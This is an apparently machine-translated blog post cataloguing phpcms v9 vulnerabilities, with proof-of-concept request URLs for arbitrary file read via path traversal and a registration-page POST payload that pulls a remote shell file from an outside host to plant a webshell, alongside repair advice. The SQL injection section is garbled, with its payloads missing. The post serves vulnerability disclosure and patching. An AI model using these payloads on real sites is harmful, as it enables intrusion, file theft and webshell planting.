phpcms vulnerability

Fenghua is a sand drifting, old is a period of time

Recently, a big cow said that it will release 3 phpcms 0day vulnerabilities. At present, I have learned that two phpcms vulnerabilities have been circulated and released poc. The scope of phpcms is still relatively wide. I will share some of the latest phpcms vulnerabilities in this record.

Disclaimer: * The tools in the article are for personal testing and research. Please delete them within 24 hours after downloading. Do not use them for commercial or illegal purposes.

phpcms arbitrary file read vulnerability

Updated on May 4, 2017
The specific details of the vulnerability reference: http://bobao.360.cn/learning/detail/3805.html

Vulnerability

Option One:
Log in to the normal user and access the link:

1
http://localhost/index.php?m=attachment&c=attachments&a=swfupload_json&aid=1&src=%26i%3D1%26m%3D1%26d%3D1%26modelid%3D2%26catid%3D6%26s%3D./phpcms/modules/content/down.ph&f=p%3%25252%2*70C

Get the assigned att_json and then bring this json value into the init function of the down class:

1
http://localhost/index.php?m=content&c=down&a=init&a_k=013ceMuDOmbKROPvvdV0SvY95fzhHTfURBCK4CSbrnbVp0HQOGXTxiHdRp2jM-onG9vE0g5SKVcO_ASqdLoOSsBvN7nFFopz3oZSTo2P7b6N_UB037kehz2lj12lFGtTsPETp-a0mAHXgyjn-tN7cw4nZdk10Mr2g5NM_x215AeqpOF6_mIF7NsXvWiZl35EmQ

Option II:
Access without logging in:

1
http://localhost/index.php?m=wap&c=index&a=init&siteid=1

Get the current siteid and then visit:

1
2
http://localhost/index.php?m=attachment&c=attachments&a=swfupload_json&aid=1&src=%26i%3D1%26m%3D1%26d%3D1%26modelid%3D2%26catid%3D6%26s%3D./phpcms/modules/content/down.ph&f=p%3%25252%2*70C
POST_DATA:userid_flash=14e0uml6m504Lbwsd0mKpCe0EocnqxTnbfm4PPLW

Repair plan

Upgrade to the latest version of the official

phpcms sql vulnerability

Little

There is a page for sql injection vulnerability:
http://192.168.1.139:8080/phpcms/index.php?m=member&c=index&a=login
Get the current database, post:

1
2
3
4
```
Get the current user, post:
```bash
Get the table name:

To get another table name, modify the limit.
Get the username:

1
2
3
```
Get password:
```bash

The obtained password is 30-bit md5, and the general MD5 is 32-bit, so we need to get the last 2 digits:

1
2
3
```
Phpcms is salt, get salt:
```bash

The above Poc comes from: https://www.unhonker.com/bug/1834.html

exp exploit script

Exp is not publicly released here using scripts. You can use the online detection platform to detect it: https://www.seebug.org/monster/
The exp script can refer to: https://www.waitalone.cn/phpcmsv9-authkey-exp.html
For details of the vulnerability, please refer to: http://mp.weixin.qq.com/s/cI-wbQyX-3WLhxJ5kqez4A

Vulnerability fix

  • Remove the modules\content\down.php file

phpcms registration page getshell vulnerability

  • Vulnerabilities: php remote file inclusion, arbitrary file upload
  • Exploit point: phpcms registration page
  • Utilization type: http post request causes arbitrary file upload + getshell

Post Little

1
siteid=1&modelid=11&username=newbie&password=newbie&email=newbie@qq.com&info[content]=<img src=http://shhdmqz.com/newbie.txt?.php#.jpg>&dosubmit=1&protocol=

Note: http://shhdmqz.com/newbie.txt is a shell file on a remote server. This vulnerability exploits remote file inclusion and file upload vulnerabilities.

Exploiting details

Visit the registration page to send the post package, reconstruct the contents of the info field, and write the remotely included file address “img src=http://shhdmqz.com/newbie.txt?.php#.jpg“, newbie.txt as the file Name, ?.php#.jpg is the name of the constructed file, in order to bypass the suffix name restrictions. The return packet will have an error message, but the file can be uploaded successfully, and the error message contains the path of the uploaded file, which can be linked with a kitchen knife.

exp exploit script

Exp is not publicly released here using scripts. You can use the online detection platform to detect it: https://www.seebug.org/monster/

Vulnerability fix

Temporary repair:

  • Close the registration page
  • Turn off remote file inclusion, ie turn off allow_url_fopen

Thorough repair:
Modify the download function in the phpcms/libs/classes/attachement.class.php file.
Foreach($remotefileurls as $k=>$file) loop, about 167 lines, will

1
if(strpos($file, '://') === false || strpos($file, $upload_url) !== false) continue; $filename = fileext($file);

changed to

1
$filename = fileext($k);

For file inclusion vulnerabilities, please refer to: [File contains vulnerabilities] (http://thief.one/2017/04/10/2/)

Arbitrary File Read Vulnerability

1
index.php?m=search&c=index&a=public_get_suggest_keyword&url=asdf&q=..\/..\/caches/error_log.php

phpcmssensitive information

  • This article will continue to track the latest vulnerability status of phpcms, and attach detection methods and repair programs to help administrators fix vulnerabilities as soon as possible, thank you! *

本文标题:phpcms vulnerability

文章作者:nmask

发布时间:2017年04月12日 - 09:04

最后更新:2019年07月11日 - 16:07

原始链接:https://thief.one/2017/04/12/01/en/

许可协议: 署名-非商业性使用-禁止演绎 4.0 国际 转载请保留原文链接及作者。

nmask wechat
欢迎您扫一扫上面的微信公众号,订阅我的博客!
坚持原创技术分享,您的支持将鼓励我继续创作!

热门文章推荐: